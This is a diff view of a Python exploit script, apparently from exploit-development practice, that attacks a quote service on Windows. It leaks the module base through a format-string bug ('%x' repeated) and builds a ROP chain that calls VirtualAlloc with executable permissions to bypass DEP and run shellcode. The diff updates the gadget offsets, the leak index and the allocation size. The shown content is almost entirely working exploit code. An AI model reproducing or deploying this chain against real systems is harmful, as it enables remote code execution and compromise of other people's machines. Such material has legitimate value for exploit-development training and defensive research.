| skipped 48 lines |
49 | 49 | | print("[+] Getting base address...") |
50 | 50 | | |
51 | 51 | | quote_id = unpack("<I", add_quote(b"%x " * 30))[0] |
52 | | - | base_str = get_quote(quote_id).split(b" ")[8].decode() |
| 52 | + | base_str = get_quote(quote_id).split(b" ")[2].decode() |
53 | 53 | | base = (int(base_str, 16) // 0x10000) * 0x10000 |
54 | 54 | | |
55 | 55 | | print(" -- " + hex(base)) |
| skipped 39 lines |
95 | 95 | | |
96 | 96 | | rop = [ |
97 | 97 | | # 1. Get ESP (in eax) |
98 | | - | base + 0x2610, # xor eax, eax ; ret |
99 | | - | base + 0x1eb1, # or eax, esp ; ret |
| 98 | + | base + 0x25c0, # xor eax, eax ; ret |
| 99 | + | base + 0x1e69, # or eax, esp ; ret |
100 | 100 | | |
101 | 101 | | # 2. Get dummy call addr (in ebx) |
102 | | - | base + 0x2b88, # pop ecx ; ret |
| 102 | + | base + 0x2b38, # pop ecx ; ret |
103 | 103 | | 0x1ec, # eax + ? = dummy call |
104 | | - | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 104 | + | base + 0x9b36, # add eax, ecx ; pop ebx ; ret |
105 | 105 | | 0xffffffff, # junk for pop ebx |
106 | | - | base + 0x1ebb, # mov ebx, eax ; ret |
| 106 | + | base + 0x1e73, # mov ebx, eax ; ret |
107 | 107 | | |
108 | 108 | | # 3. Deref virtualAlloc (in eax) |
109 | | - | base + 0x2b87, # pop eax ; pop ecx ; ret |
110 | | - | base + 0x4321c, # base + iat + virtualalloc |
| 109 | + | base + 0x2b37, # pop eax ; pop ecx ; ret |
| 110 | + | base + 0x43218, # base + iat + virtualalloc |
111 | 111 | | 0xffffffff, # junk for pop ecx |
112 | | - | base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret |
| 112 | + | base + 0x1e6c, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret |
113 | 113 | | 0xffffffff, # junk for pop edx |
114 | 114 | | |
115 | 115 | | # 4. Write virtual alloc to dummy |
116 | | - | base + 0x1ec2, # mov [ebx], eax ; ret |
| 116 | + | base + 0x1e7a, # mov [ebx], eax ; ret |
117 | 117 | | |
118 | 118 | | # 5. Get shellcode addr (in eax) |
119 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
120 | | - | base + 0x2d3c, # mov eax, edx ; ret |
121 | | - | base + 0x2b88, # pop ecx ; ret |
| 119 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 120 | + | base + 0x2cec, # mov eax, edx ; ret |
| 121 | + | base + 0x2b38, # pop ecx ; ret |
122 | 122 | | 0x18, # eax + ? = dummy call |
123 | | - | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 123 | + | base + 0x9b36, # add eax, ecx ; pop ebx ; ret |
124 | 124 | | 0xffffffff, # junk for pop ebx |
125 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 125 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
126 | 126 | | |
127 | 127 | | # 6. Get dummy call addr + 0x4 (in ebx) |
128 | | - | base + 0x1eca, # add ebx, 0x4 ; ret |
| 128 | + | base + 0x1e82, # add ebx, 0x4 ; ret |
129 | 129 | | |
130 | 130 | | # 7. Write shellcode addr to dummy + 0x4 |
131 | | - | base + 0x1ec2, # mov [ebx], eax ; ret |
| 131 | + | base + 0x1e7a, # mov [ebx], eax ; ret |
132 | 132 | | |
133 | 133 | | # 8. Get dummy call addr + 0x8 (in ebx) |
134 | | - | base + 0x1eca, # add ebx, 0x8 ; ret |
| 134 | + | base + 0x1e82, # add ebx, 0x4 ; ret |
135 | 135 | | |
136 | 136 | | # 9. Write shellcode addr to dummy + 0x8 |
137 | | - | base + 0x1ec2, # mov [ebx], eax ; ret |
| 137 | + | base + 0x1e7a, # mov [ebx], eax ; ret |
138 | 138 | | |
139 | 139 | | # 10. Align esp with dummy call (ebx-8) |
140 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
141 | | - | base + 0x2b88, # pop ecx ; ret |
| 140 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 141 | + | base + 0x2b38, # pop ecx ; ret |
142 | 142 | | 0xfffffff8, # edx + ? = dummy call |
143 | | - | base + 0x1ece, # add edx, ecx ; ret |
144 | | - | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
145 | | - | base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret |
| 143 | + | base + 0x1e86, # add edx, ecx ; ret |
| 144 | + | base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 145 | + | base + 0x1e76, # xchg ebx, esp ; dec ecx ; ret |
146 | 146 | | ] |
147 | 147 | | rop = b"".join([pack("<I", r) for r in rop]) |
148 | 148 | | |
| skipped 2 lines |
151 | 151 | | dummy = b"aaaa" # VirtualAlloc |
152 | 152 | | dummy += b"bbbb" # return <- shellcode addr |
153 | 153 | | dummy += b"cccc" # lpAddress <- shellcode addr |
154 | | - | dummy += pack("<I", 0x1) # dwSize <- 0x1 |
| 154 | + | dummy += pack("<I", 0x200) # dwSize <- 0x1 |
155 | 155 | | dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000 |
156 | 156 | | dummy += pack("<I", 0x40) # flProtect <- 0x40 |
157 | 157 | | |
| skipped 13 lines |